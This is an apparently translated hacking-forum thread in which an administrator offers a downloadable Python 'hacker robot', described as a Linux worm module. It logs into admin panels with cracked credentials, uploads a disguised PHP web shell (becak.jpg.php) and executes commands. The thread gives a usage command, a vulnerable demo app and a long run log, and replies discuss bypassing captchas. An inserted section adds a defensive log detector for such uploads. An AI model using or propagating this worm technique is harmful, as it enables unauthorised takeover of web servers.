Hacker robot simulation: log in to the admin page, upload a shell and execute commands

02-07-2011, 03:43 AM (This post was last modified: 02-07-2011 04:15 AM by mywisdom.)
Post: #1
mywisdom (Administrator, Posts: 921, Joined: Dec 2009, Reputation: 44)
http://myw1sd0m.blogspot.com/2011/02/how...ction.html
[Image: worm.jpg]

download the hacker robot:
http://www.ziddu.com/download/13701661/r...r.tgz.html
download the SQL for the test database: http://sowiesoft.com/.../produk.sql
what is needed:
- Linux OS
- lampp or similar (what matters is that it can run apache, php, mysql)
- create a database in mysql named `tes` ---> for the demo; inside robot_hacker there is a folder named `login`, which is the demo admin path to be hacked. Save it under /opt/lampp/htdocs or another path so that it can later be reached at http://localhost/login
database for the sample admin login: tes, with 1 table:
Code:
-- Database: `tes`
--
CREATE TABLE IF NOT EXISTS `produk` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `nama` tinytext NOT NULL,
  `foto` tinytext NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;
--

for example, one level above the login path, prepare a file index.php containing:
Code:
<?php
// Demo front page: lists every product and its photo from the `tes` database.
// Photos are served straight from login/upload/, the directory the upload form writes to.
error_reporting(1);

$k = mysql_connect("localhost", "root", "");
if ($k)
{
    mysql_select_db("tes");
    $s = "select * from `produk`";
    $q = mysql_query($s);
    // $r[1] is `nama`, $r[2] is `foto`
    while ($r = mysql_fetch_row($q))
    {
        echo "<img src='login/upload/$r[2]'>$r[1]<br><br>";
    }
}
?>


- python

actually this is one of the modules of a Linux worm
logic:
after the worm gets the admin user and password from hzosql (for instance as an md5 hash of the password), it submits it to a hash cracker to fetch the password; next the worm looks for the admin path, and finally:
the worm executes this hacker robot with the command:
python robot.py 'http://url_path_admin' 'username' 'password' 'perintah'

for example: python robot.py 'http://localhost/login' 'admin' 'admin' 'whoami'


here is what it looks like in action:


Code:
root@bt:/home/mywisdom/mekanik/robot_hacker# python robot_hacker.py 'http://localhost/login' 'admin' 'admin' 'whoami'
robot_hacker.py:44: UserWarning: gzip transfer encoding is experimental!
  br.set_handle_gzip(True)
<form action="?page=login" method="post">
user: <input type="text" name="user">
<br>
pass:
<input type="password" name="password">
<br>

<input type="submit" value="login">
</form>

ga nemu post
ga nemu text
ga nemu text
ga nemu text
ga nemu text
ga nemu post
ga nemu text
ga nemu post
ga nemu text
ga nemu post
ga nemu text
ga nemu text
ga nemu post
ga nemu text
ga nemu text
url login http://localhost/login/?page=login
form login user
  
form password password
  
robot_hacker.py:114: UserWarning: gzip transfer encoding is experimental!
  br.set_handle_gzip(True)
auto login:http://localhost/login/?page=login
bukan log out aman di klik:x.php
unso:halaman x
bukan form upload, lanjut cari lagi
bukan log out aman di klik:x.php
unso:halaman x
bukan form upload, lanjut cari lagi
bukan log out aman di klik:upload.php
unso:    

<form enctype="multipart/form-data" action="?up=yes" method="post">
nama:
<input type=text name=nama>
<br>

email:
<input type=text name=email>
<br>

text:
<textarea name=keterangan></textarea>
<br>

file to upload : <input type="file" name="file">
<br>
nomer: <input type=text name=nomer>
<br>
pilih kategori:
<select name=kategori>
<option value=''>pilih ini dulu baru boleh upload :-p</option>

<option value='satu'>satu</option>
<option value='dua'>dua</option>
</select>
<input type="submit" name="sub">
</form>
    

gue temuin page form upload di:upload.php muahahahahahahaha gw emang worm yg cadas bruakakakaka
oye gue mao coba-coba ngupload shell:/home/mywisdom/mekanik/robot_hacker/becak.jpg.php
perhatian!!! gue ini worm bukan orang !!! lu kira gue orang? muka gile lu
auto login:upload.php
data form kotor:
bukan input box cuy
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:POST http://localhost/login/upload.php?up=yes multipart/form-data
  
bukan input box cuy
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:TextControl(nama=)>
  
--------------------------------ditemukan inputbox dengan nama:nama
  
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:TextControl(email=)>
  
--------------------------------ditemukan inputbox dengan nama:email
  
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:TextareaControl(keterangan=)>
  
bukan input box cuy
--------------------------------ditemukan textarea dengan nama:keterangan
  
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:FileControl(file=
bukan input box cuy
bukan textarea cuy
---------------------------------ditemukan file upload dengan nama:file
bukan select juga ni cuy
data form kotor:No files added>)>
  
bukan input box cuy
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:TextControl(nomer=)>
  
--------------------------------ditemukan inputbox dengan nama:nomer
  
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:SelectControl(kategori=[*, satu, dua])>
  
bukan input box cuy
bukan textarea cuy
bukan buat ngupload cuy
perkiraan isi select: satu
---------------------------------ditemukan select dengan nama:kategori
data form kotor:SubmitControl(sub=) (readonly)>>
bukan input box cuy
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
[+]nyoba ngupload dulu cuy
uploading: /home/mywisdom/mekanik/robot_hacker/becak.jpg.php
nama inputan dengan aray:nama
nama inputan dengan aray:email
nama inputan dengan aray:nomer
nama inputan:keterangan
nama inputan:file
nama inputan:kategori
aman
pertama tama kita cari dulu kemungkinan mendapatkan path shell dari halaman setelah submit upload
gak nemu di sini, melanjutkan pencarian path ke halaman depan situs
ada path becak mari kita parsing untuk mendapatkan path becak
tes:<img src='login
belum ditemukan <img src='login
belum ditemukan upload
t:2
hmmm sepertinya ditemukan pola shell kita pada string:becak.jpg.php'>becak.jpg.php<br><br><img src='login
string sebelumnya:upload
string sebelumnya:<img src='login
kemungkinan path kedalaman kedua:login
--->tambalan:upload
kemungkinan kue:becak.jpg.php'>becak.jpg.php<br><br><img src='login
parsingan------------>becak.jpg.php'>becak.jpg.php<br><br><img src
parsingan------------>'login
cake2:becak.jpg.php'>becak.jpg.php<br><br><img src='login
kemungkinan string mengandung path:login
kemungkinan nama file shell:becak.jpg.php
------------url 2 kemungkinan lokasi shell kita--------------
http://localhost/login/login/becak.jpg.php
http://localhost//login/becak.jpg.php
http://localhost//login/upload/becak.jpg.php
http://localhost/login/login/becak.jpg.php
http://localhost/login/login/upload/becak.jpg.php
tidak ditemukan shell kita di http://localhost/login/login/becak.jpg.php
tidak ditemukan shell kita di http://localhost//login/becak.jpg.php
woot ditemukan shell di url:http://localhost//login/upload/becak.jpg.php
nobody
for the PoC, a sample application with an admin login has been prepared in the robot hacker folder; just move it into the htdocs path, and the database name is `tes` as above
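A defender's counterpart to the run above, added here as an example and not part of the original post or the robot_hacker tool: a small Python 3 detector that parses Apache combined-format access log lines and flags the sequence the robot produces, a POST to the upload endpoint followed shortly by a successful GET for a script file under the upload directory (the `becak.jpg.php` double extension). The sample log lines are constructed to mirror the demo run; the paths /login/upload.php and /login/upload/ come from the thread, the 5-minute window and the extension list are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines modelled on the demo run in the thread (not real logs).
SAMPLE_LOG = """\
127.0.0.1 - - [07/Feb/2011:03:40:01 +0700] "POST /login/?page=login HTTP/1.1" 200 512 "-" "Python-urllib/2.6"
127.0.0.1 - - [07/Feb/2011:03:40:02 +0700] "GET /login/upload.php HTTP/1.1" 200 833 "-" "Python-urllib/2.6"
127.0.0.1 - - [07/Feb/2011:03:40:03 +0700] "POST /login/upload.php?up=yes HTTP/1.1" 200 120 "-" "Python-urllib/2.6"
127.0.0.1 - - [07/Feb/2011:03:40:04 +0700] "GET /login/upload/becak.jpg.php HTTP/1.1" 200 7 "-" "Python-urllib/2.6"
10.0.0.5 - - [07/Feb/2011:03:41:00 +0700] "GET /login/upload/becak.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SCRIPT_EXT = {"php", "php3", "php5", "phtml", "phar"}   # assumed list of server-side extensions
UPLOAD_DIRS = ("/login/upload/",)                       # where the demo app stores uploads
UPLOAD_ENDPOINTS = ("/login/upload.php",)               # the form handler the robot posts to

def parse(line):
    """Parse one combined-format line into a dict; query strings are stripped from the path."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["path"] = d["path"].split("?", 1)[0]
    return d

def is_script_in_upload_dir(path):
    """True when the last extension of a file under an upload directory is executable,
    which also catches double extensions such as becak.jpg.php."""
    if not path.startswith(UPLOAD_DIRS):
        return False
    parts = path.rsplit("/", 1)[-1].lower().split(".")
    return len(parts) > 1 and parts[-1] in SCRIPT_EXT

def find_upload_then_execute(log_text, window=timedelta(minutes=5)):
    """Return (ip, path) pairs: a POST to an upload endpoint followed within `window`
    by a 200 GET for a script inside the upload directory from the same client IP."""
    last_upload = {}   # ip -> timestamp of the most recent POST to an upload endpoint
    hits = []
    for line in log_text.splitlines():
        r = parse(line)
        if r is None:
            continue
        if r["method"] == "POST" and r["path"] in UPLOAD_ENDPOINTS:
            last_upload[r["ip"]] = r["ts"]
        elif r["method"] == "GET" and r["status"] == "200" and is_script_in_upload_dir(r["path"]):
            t = last_upload.get(r["ip"])
            if t is not None and r["ts"] - t <= window:
                hits.append((r["ip"], r["path"]))
    return hits
```

Running it over the sample flags only the 127.0.0.1 sequence; the plain becak.jpg fetch from 10.0.0.5 is ignored. The same filename check belongs in the upload handler itself, which is the validation the author lists as the robot's third weakness.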
02-07-2011, 03:47 AM (This post was last modified: 02-07-2011 03:54 AM by android2009.)
Post: #2
android2009 (./Devilz Officer, Posts: 81, Joined: Dec 2009, Reputation: 3)
what is it for, bro?

02-07-2011, 03:50 AM
Post: #3
mywisdom (Administrator, Posts: 921, Joined: Dec 2009, Reputation: 44)
a simulation of a hacker who logs in to the admin path, looks for an upload form, uploads a shell and executes commands; this is a Linux worm module
02-07-2011, 03:52 AM
Post: #4
android2009 (./Devilz Officer, Posts: 81, Joined: Dec 2009, Reputation: 3)
which one gets executed first, the perl file or the python one?
02-07-2011, 03:55 AM (This post was last modified: 02-07-2011 03:56 AM by mywisdom.)
Post: #5
mywisdom (Administrator, Posts: 921, Joined: Dec 2009, Reputation: 44)
the python one; it's actually meant for a worm, but just give it a try
weaknesses:
- can't bypass captcha
- form parsing is sometimes not accurate
- can't bypass upload form validation that blocks shells
02-07-2011, 09:14 AM
Post: #6
kiddies (Administrator, Posts: 1,223, Joined: Dec 2009, Reputation: 40)
bypassing captcha, bro... hehe... the logic is sometimes different... if you want, go for a CMS... usually their captchas are all the same... with custom-made ones it's sometimes tricky, you have to understand the logic again...
02-07-2011, 01:02 PM
Post: #7
rydcenter (./Devilz Commander, Posts: 285, Joined: Feb 2010, Reputation: 8)
let me try it out first, bro
02-07-2011, 01:08 PM
Post: #8
Cruz3N (Mod Terganteng, Global Moderators, Posts: 1,651, Joined: Dec 2009, Reputation: 72)
The messages are so annoying... wokwokwokwokwokowkowkowk

Code:
gue temuin page form upload di:upload.php muahahahahahahaha gw emang worm yg cadas bruakakakaka
oye gue mao coba-coba ngupload shell:/home/mywisdom/mekanik/robot_hacker/becak.jpg.php
perhatian!!! gue ini worm bukan orang !!! lu kira gue orang? muka gile lu
02-07-2011, 02:44 PM
Post: #9
blackhat (./Devilz 1st Cadet, Posts: 34, Joined: Feb 2011, Reputation: 6)
(02-07-2011 01:08 PM)Cruz3N Wrote:  The messages are so annoying... wokwokwokwokwokowkowkowk

Code:
gue temuin page form upload di:upload.php muahahahahahahaha gw emang worm yg cadas bruakakakaka
oye gue mao coba-coba ngupload shell:/home/mywisdom/mekanik/robot_hacker/becak.jpg.php
perhatian!!! gue ini worm bukan orang !!! lu kira gue orang? muka gile lu

cool. Thanks for sharing.
02-07-2011, 02:49 PM
Post: #10
note (DC Security terganteng, DC Security Grup, Posts: 1,279, Joined: Feb 2010, Reputation: 13)
(02-07-2011 01:08 PM)Cruz3N Wrote:  The messages are so annoying... wokwokwokwokwokowkowkowk

Code:
gue temuin page form upload di:upload.php muahahahahahahaha gw emang worm yg cadas bruakakakaka
oye gue mao coba-coba ngupload shell:/home/mywisdom/mekanik/robot_hacker/becak.jpg.php
perhatian!!! gue ini worm bukan orang !!! lu kira gue orang? muka gile lu

whoa, let me test it